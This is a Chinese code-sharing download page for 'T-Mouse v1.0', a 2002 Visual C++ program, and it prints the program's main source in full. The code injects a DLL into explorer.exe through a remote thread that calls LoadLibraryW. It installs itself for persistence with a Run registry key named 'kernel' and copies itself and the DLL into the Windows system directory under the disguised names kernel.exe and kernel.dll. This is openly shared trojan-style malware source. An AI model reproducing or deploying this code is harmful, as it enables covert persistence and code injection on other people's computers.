T-Mouse v1.0 基于远程线程结构程序vc++.rar

  • 管理员
    了解作者
  • Visual C++
    开发工具
  • 2KB
    文件大小
  • rar
    文件格式
  • 0
    收藏次数
  • 10 积分
    下载积分
  • 218
    下载次数
  • 2005-09-10 21:47
    上传日期
基于远程线程结构程序。开发环境vc++。
T-Mouse v1.0 基于远程线程结构程序vc++.rar
  • MyDll.cpp
    1.3KB
  • www.pudn.com.txt
    218B
  • T-Mouse.cpp
    5.1KB
内容介绍
#include <windows.h> #include <stdlib.h> #include <stdio.h> #include <conio.h> #include "psapi.h" #pragma comment (lib,"psapi") DWORD processtopid(char *); BOOL rgst(); void start(); PDWORD pdwthreadid; HANDLE hremotethread,hremoteprocess; DWORD fdwcreate,dwstacksize,dwremoteprocessid; PWSTR pszlibfileremote=NULL; int main() { int cb; char *argv1,*argv2,*argv3; char lpdllfullpathname[MAX_PATH]; WCHAR pszlibfilename[MAX_PATH]={0}; PTHREAD_START_ROUTINE pfnstartaddr; argv1="explorer.exe"; argv2="MyDll.dll"; argv3="kernel.dll"; rgst(); start(); dwremoteprocessid=processtopid(argv1); if(GetCurrentDirectory(MAX_PATH,lpdllfullpathname)==0) { printf("GetCurrentDirectory Error: %d\n",GetLastError()); getche(); return -1; } strcat(lpdllfullpathname,"\\"); strcat(lpdllfullpathname,argv2); if((int)_lopen(lpdllfullpathname,OF_READ)==HFILE_ERROR) { GetSystemDirectory(lpdllfullpathname,MAX_PATH); strcat(lpdllfullpathname,"\\"); strcat(lpdllfullpathname,argv3); if((int)_lopen(lpdllfullpathname,OF_READ)==HFILE_ERROR) { printf("DLL file could not be found!\n"); getche(); return -1; } } if(MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpdllfullpathname,strlen(lpdllfullpathname),pszlibfilename,MAX_PATH)==0) { printf("MultiByteToWideChar Error: %d",GetLastError()); getche(); return -1; } hremoteprocess=OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE,FALSE,dwremoteprocessid); if((int)hremoteprocess==NULL) { printf("Remote Process not Exist or Access Denied\n"); getche(); return -1; } cb=(1+lstrlenW(pszlibfilename))*sizeof(WCHAR); pszlibfileremote=(PWSTR)VirtualAllocEx(hremoteprocess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); if((int)pszlibfileremote==NULL) { printf("VirtualAllocEx Error: %d",GetLastError()); getche(); return -1; } if(WriteProcessMemory(hremoteprocess,pszlibfileremote,(PVOID)pszlibfilename,cb,NULL)==FALSE) { printf("WriteProcessMemory Error: %d",GetLastError()); getche(); return -1; } pfnstartaddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW"); if((int)pfnstartaddr==NULL) { printf("GetProcAddress Error: %d\n",GetLastError()); getche(); return -1; } hremotethread=CreateRemoteThread(hremoteprocess,NULL,0,pfnstartaddr,pszlibfileremote,0,NULL); if((int)hremotethread==NULL) { printf("Create Remote Thread Error: %d\n",GetLastError()); getche(); return -1; } WaitForSingleObject(hremotethread,INFINITE); if(pszlibfileremote!=NULL) { VirtualFreeEx(hremoteprocess,pszlibfileremote,0,MEM_RELEASE); } if(hremotethread !=NULL) { CloseHandle(hremotethread); } if(hremoteprocess!=NULL) { CloseHandle(hremoteprocess); } getche(); return 0; } DWORD processtopid(char *inputprocessname) { DWORD aprocesses[1024],cbneeded,cprocesses; UINT i; HANDLE hprocess; HMODULE hmod; char szprocessname[MAX_PATH]="UnknownProcess"; if(!EnumProcesses(aprocesses,sizeof(aprocesses),&cbneeded)) { return -1; } cprocesses=cbneeded/sizeof(DWORD); for(i=0;i<cprocesses;i++) { hprocess=OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE,aprocesses[i]); if(hprocess) { if(EnumProcessModules(hprocess,&hmod,sizeof(hmod),&cbneeded)) { GetModuleBaseName(hprocess,hmod,szprocessname,sizeof(szprocessname)); if(!_stricmp(szprocessname,inputprocessname)) { CloseHandle(hprocess); return (aprocesses[i]); } } } } CloseHandle(hprocess); return 0; } void start() { printf("---[ T-mouse v1.0, by TOo2y ]---\n"); printf("---[ E-mail: TOo2y@safechina.net ]---\n"); printf("---[ HomePage: www.safechina.net ]---\n"); printf("---[ Date: 9-26-2002 ]---\n\n"); return; } BOOL rgst() { HKEY hkey; LPSTR filenewname; LPSTR filecurrentname; DWORD type=REG_SZ; LPCTSTR rgspath="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; char currentpath[MAX_PATH]; char syspath[MAX_PATH]; long ret; GetSystemDirectory(syspath,MAX_PATH); filenewname=lstrcat(syspath,"\\kernel.exe"); ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey); if(ret!=ERROR_SUCCESS) { RegCloseKey(hkey); return FALSE; } ret=RegSetValueEx(hkey,"kernel",NULL,type,(const unsigned char *)filenewname,MAX_PATH); if(ret!=ERROR_SUCCESS) { RegCloseKey(hkey); return FALSE; } RegCloseKey(hkey); GetSystemDirectory(syspath,MAX_PATH); GetCurrentDirectory(MAX_PATH,currentpath); filecurrentname=lstrcat(currentpath,"\\MyDll.dll"); filenewname=lstrcat(syspath,"\\kernel.dll"); ret=CopyFile(filecurrentname,filenewname,TRUE); if(!ret) { return TRUE; } GetSystemDirectory(syspath,MAX_PATH); GetModuleFileName(NULL,currentpath,MAX_PATH); filecurrentname=currentpath; filenewname=lstrcat(syspath,"\\kernel.exe"); ret=CopyFile(filecurrentname,filenewname,TRUE); if(!ret) { return TRUE; } return TRUE; }
评论
    相关推荐